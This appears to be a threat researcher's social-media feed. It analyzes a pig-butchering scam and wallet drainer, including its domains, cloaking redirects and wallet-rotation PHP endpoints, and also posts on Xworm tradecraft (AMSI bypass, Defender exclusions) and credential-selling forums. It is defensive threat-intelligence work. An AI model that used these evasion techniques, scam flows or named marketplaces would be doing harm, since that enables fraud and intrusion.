Cyb3rhawk

From Partner Search to Pig Butchering: Part 2, Wallet Drainer In the previous post, I documented a pig butchering operation from initial contact through attack delivery. This technical analysis covers…

You can follow the full story medium.com/adhd-attack-...

Scale indicators:
$350,000 through one wallet (20 days)
891 domains across 48 countries
Multi-language support infrastructure
The attack surface expands as #Web3 adoption increases.

The technical attack is simple.
The #social #engineering makes it work.
Matrimonial platform targeting. Patient relationship building. Native language adaptation.

Standard: #Firebase hosting, CDN distribution, transit wallets, DEX swaps
Custom: #Flutter backend, dynamic #wallet rotation, multi-language support, identity harvesting
More infrastructure than commodity campaigns. Established operation with development resources.

Broader context: analyzed 1,855 #crypto #phishing URLs (Jan 2024 - Dec 2025).
658 unique IPs 891 unique domains 48 countries
Top platforms: Firebase (web.app), Netlify, Vercel Elena case uses: Firebase + Fastly CDN + AWS backend

Wallet timeline:
Most wallets activated: November 2025
Recent activity: Last 7 days
Initial transactions: 19 days ago
One outgoing wallet previously received funds from a wallet flagged as phishing.
Elena''s operation = one campaign among many.

Some Externally Owned Account (EOA) wallets have
a single inbound from the primary wallet. Single outbound to: HitBTC Hot Wallet 4.
HitBTC = known for lax KYC enforcement.

Primary wallet analysis:
In: 119.844 #ETH ($350k+) Out: 119.837 ETH ($350k+) Balance: 0.0064 ETH ($19.36)
High-throughput #transit node. Funds move immediately.
Uses TransitSwap v5 Router (DEX aggregator) to convert ETH → stablecoins (USDT/USDC).

URLscan.io shows t4smydata[.]com hosted a #Malay-language investment site ("Invest J") one year ago.
Same infrastructure. Different language. Different campaign.
This domain gets recycled: Malay → English/Chinese/Japanese/Korean.

Identity verification endpoints and banking info collection detected.
Possible future uses:
Identity fraud
Fake verification to build trust
Data resale on #dark #web markets

Full KYC harvesting capability.

Full infra observed:
Wallets: loadWalletUSDT/BTC/ETH.php Accounts: loginUser.php, registerUser.php, updatePassword.php Financial: createBuyCoin.php, createRecords.php, createWithdrawRecords.php
Identity: updateUserFrontIc.php, updateUserBackIc.php Banking: updateUserBank.php

Three #PHP scripts fetch wallet addresses on demand:

loadWalletUSDT.php
loadWalletBTC.php
loadWalletETH.php

Real-time wallet rotation. Different victims see different addresses.

Console logs in Chinese: "在 App 内嵌浏览器中"
The Flutter web app loads from t4smydata[.]com (3.0.56.137 - AWS Singapore).
Compiled Dart to #JavaScript. Uses CanvasKit/Skia rendering.
No hardcoded wallet addresses.
Instead: dynamic retrieval via PHP endpoints.

Coinbase - Buy and Sell Bitcoin, Ethereum, and more with trust Coinbase is a secure online platform for buying, selling, transferring, and storing cryptocurrency.

The Firebase page has JavaScript to vet traffic.
Checks user agent for in-app browsers (iOS WebView, Android WebView).
In-app browser? Load the malicious Flutter app. Standard browser? Redirect to legitimate coinbase.com.
#CryptoScam #Firebase #Web3Security

"Elena" sends a link: www[.]bt-trade[.]it[.]com
Basic HTML page. Auto-redirects to Firebase hosting via authCheck() function.
First redirect lands at: bitplus-official[.]web[.]app
Both domains hosted on 199.36.158.100 (Google LLC).
#Infosec #CyberCrime #ThreatHunting #ScamAlert

Tracked a pig butchering operation from the #Indian #Matrimony search app to a wallet drainer.
One wallet. 20 days. $350,000+ in ETH.
Here's the technical breakdown:
#ThreatIntel #CryptoFraud #PigButchering #OSINT #BlockchainAnalysis #DetectionEngineering #CyberThreatIntelligence

From Partner Search to Pig Butchering: Part 1 Crypto scams are common; these days, they are baked into several infostealers, wallet drainers, and many more. We document and hear about…

Part 1 is live now. The Technical dive drops soon.
medium.com/@cyb3r-hawk/...

We often think victims are "clueless," but these try to exploit our most basic needs for "connection." It opens doors that otherwise would be kept closed.

The shift to crypto wasn't a "pitch." It was a casual mention of her portfolio during a talk about the future. By the time the link arrived, I wasn't talking to a "scammer" but someone who had been helpful, patient, and consistent.
#Infosec #Web3Security #SocialEngineering

I found her "personal" photos active on 5 sites targeting different diaspora groups with the same face.
#OSINT #SouthAsia #Diaspora

The persona, "Elena," followed the common practice of family-facilitated introductions. She spoke the native language, did a voice call, and understood the high baseline of trust in these spaces. No pressure, no red flags. Just days of "getting to know" each other.

I tracked a "Pig Butchering" scammer across several South Asian matrimonial platforms. This wasn't a bot or a crude script. It was a patient, human-led operation that used cultural trust as a weapon
#CyberSecurity #CryptoScam #PigButchering #SocialEngineering #India #Matrimony

As recent SharePoint exploits settled a bit, I wanted to analyze payload variants to understand why attackers made specific choices. ASPX for quick access, DLLs for persistence, and IIS modules for blending in.

Soul instead of Shell — Payloads with Purpose What SharePoint’s RCE May Teach Us About Payload Design and Detection/Hunt Strategy

The goal of the blog (Soul instead of Shell) is to understand constraints that force payload decisions and how they can help us detect/hunt.
 Every payload has a soul - and understanding it makes us better hunters.

medium.com/@cyb3r-hawk/...

medium.com/me/stats/pos... medium.com/me/stats/pos...

(urlscan: page.url:http://bitbucket.org task.url:http://blogspot.com)
Hunt:
Who runs netsh + context?
How often Set-MpPreference is used?
Who creates exclusions, and when?

Key TTPs:
AMSI bypass (reflection, AMSIReaper, NukeAMSI)
COM hijacking for persistence
Defender exclusions (paths/exts/procs)
UAC bypass (EnableLUA)
Firewall off (netsh)
Set-MpPreference abuse
C2: Blogspot → bitbucket redirects

Recent #Xworm infections (esp. during tax season) follow a pattern:
mshta.exe → Scheduled Tasks → IEX execution.

#ThreatHunting #DetectionEngineering #MalwareAnalysis #DefenseEvasion

Credential sellers: DaisyCloud (also sells RedLine stealer logs), moderdolboeb, m3g4
Distribution Locations:https://t[.]me/+seHLUhOHbVhMDM0, breachforums, cracking[.]org,hard-tm[.]su, nohide[.]space, darknetarmy[.]com, niflheim[.]world,nulledbb[.]com, niflheim[.]world.

"A.P.E.X: Threat Hunting Through Structured Hypothesis Generation Our latest report on Hunters International ransomware provides several hypotheses you can implement in your environment. We want to reiterate the importance of integrating environmental context with t...

We will end with the Hunting Hypothesis using A.P.E.X (lnkd.in/gJ9BmStA) and Adversary infrastructure queries to discover Lumma panels, C2s, etc.

Telegram distribution via t[.]me/hitbase, t[.]me/sharmamod disguised as IPTV or Netflix access.